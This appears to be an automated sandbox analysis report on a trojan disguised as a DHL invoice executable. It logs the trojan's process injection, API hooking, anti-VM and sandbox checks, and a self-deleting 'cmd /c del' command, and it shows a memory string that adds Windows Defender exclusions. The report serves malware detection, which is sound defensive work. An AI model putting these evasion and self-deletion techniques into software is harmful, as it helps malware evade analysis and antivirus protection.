          Source: invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.438653461.00000000033D0000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamemsdt.exej% vs invoice dhl.delivery document and original invoice sign.exe
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.437873001.00000000016EF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs invoice dhl.delivery document and original invoice sign.exe
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.437330999.000000000155F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs invoice dhl.delivery document and original invoice sign.exe
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000003.00000003.361549231.0000000001116000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs invoice dhl.delivery document and original invoice sign.exe
          Source: invoice dhl.delivery document and original invoice sign.exeBinary or memory string: OriginalFilenameCMSFILEWRITABLETY.exe4 vs invoice dhl.delivery document and original invoice sign.exe
          Source: invoice dhl.delivery document and original invoice sign.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: invoice dhl.delivery document and original invoice sign.exeReversingLabs: Detection: 28%
          Source: invoice dhl.delivery document and original invoice sign.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe "C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe"
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess created: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess created: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe"
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\invoice dhl.delivery document and original invoice sign.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@2/1
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7108:120:WilError_01
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000000.00000002.364023300.0000000003879000.00000004.00000001.sdmpBinary or memory string: .SlnpI3O)
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000000.00000002.364023300.0000000003879000.00000004.00000001.sdmpBinary or memory string: .Slnp
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: invoice dhl.delivery document and original invoice sign.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: invoice dhl.delivery document and original invoice sign.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: msdt.pdbGCTL source: invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.438653461.00000000033D0000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: invoice dhl.delivery document and original invoice sign.exe, 00000003.00000003.361108586.0000000001000000.00000004.00000001.sdmp, invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.437330999.000000000155F000.00000040.00000001.sdmp, msdt.exe, 0000000B.00000002.622836727.00000000049FF000.00000040.00000001.sdmp, msdt.exe, 0000000B.00000002.622596492.00000000048E0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: invoice dhl.delivery document and original invoice sign.exe, invoice dhl.delivery document and original invoice sign.exe, 00000003.00000003.361108586.0000000001000000.00000004.00000001.sdmp, invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.437330999.000000000155F000.00000040.00000001.sdmp, msdt.exe, msdt.exe, 0000000B.00000002.622836727.00000000049FF000.00000040.00000001.sdmp, msdt.exe, 0000000B.00000002.622596492.00000000048E0000.00000040.00000001.sdmp
          Source: Binary string: msdt.pdb source: invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.438653461.00000000033D0000.00000040.00020000.sdmp

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: invoice dhl.delivery document and original invoice sign.exe, u0006u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.invoice dhl.delivery document and original invoice sign.exe.4e0000.0.unpack, u0006u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.invoice dhl.delivery document and original invoice sign.exe.4e0000.0.unpack, u0006u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.990000.1.unpack, u0006u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.990000.2.unpack, u0006u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.990000.9.unpack, u0006u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.990000.0.unpack, u0006u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 3.2.invoice dhl.delivery document and original invoice sign.exe.990000.1.unpack, u0006u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.990000.7.unpack, u0006u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.990000.3.unpack, u0006u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.990000.5.unpack, u0006u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 0_2_004E2855 push ds; ret
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 0_2_004E322B push ds; ret
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0041685A push C1F93286h; ret
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0041D4B5 push eax; ret
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0041D56C push eax; ret
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0041D502 push eax; ret
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0041D50B push eax; ret
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0041660F push ss; retf
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0040B75A push esp; retf
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_00992855 push ds; ret
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0099322B push ds; ret
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014BD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0495D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0071685A push C1F93286h; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0071D4B5 push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0071D56C push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0071D502 push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0071D50B push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0071660F push ss; retf
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0070B75A push esp; retf
          Source: initial sampleStatic PE information: section name: .text entropy: 7.80084963355
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeFile created: \invoice dhl.delivery document and original invoice sign.exe
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeFile created: \invoice dhl.delivery document and original invoice sign.exe

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8C 0xCE 0xE1
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: /c del "C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe"
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: /c del "C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe"
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000000.00000002.363236510.00000000028A6000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.363182286.0000000002871000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: invoice dhl.delivery document and original invoice sign.exe PID: 3452, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000000.00000002.363236510.00000000028A6000.00000004.00000001.sdmp, invoice dhl.delivery document and original invoice sign.exe, 00000000.00000002.363182286.0000000002871000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000000.00000002.363236510.00000000028A6000.00000004.00000001.sdmp, invoice dhl.delivery document and original invoice sign.exe, 00000000.00000002.363182286.0000000002871000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 0000000000709904 second address: 000000000070990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 0000000000709B7E second address: 0000000000709B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe TID: 3576Thread sleep time: -40062s >= -30000s
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe TID: 5916Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 6932Thread sleep time: -38000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\msdt.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_00409AB0 rdtsc
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeThread delayed: delay time: 40062
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeThread delayed: delay time: 922337203685477
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000000.00000002.363182286.0000000002871000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000005.00000000.374553794.00000000083E8000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000005.00000000.403668866.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000000.00000002.363182286.0000000002871000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000005.00000000.388071286.0000000006420000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000000.00000002.363182286.0000000002871000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000005.00000000.374553794.00000000083E8000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000005.00000000.388071286.0000000006420000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.390916923.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000005.00000000.390916923.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000005.00000000.403668866.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000000.00000002.363182286.0000000002871000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000005.00000000.365143157.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_00409AB0 rdtsc
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0148B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0148B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0146C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0146B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0146B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01469100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01469100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01469100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01484120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01484120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01484120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01484120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01484120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014F41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0146B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0146B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0146B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0148C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01492990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014961A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014961A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_015249A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_015249A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_015249A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_015249A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01480050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01480050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01522073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01531074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01534015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01534015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0147B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0147B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0147B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0147B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014FB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014640E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014640E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014640E1 mov eax, dword ptr fs:[00000030h]
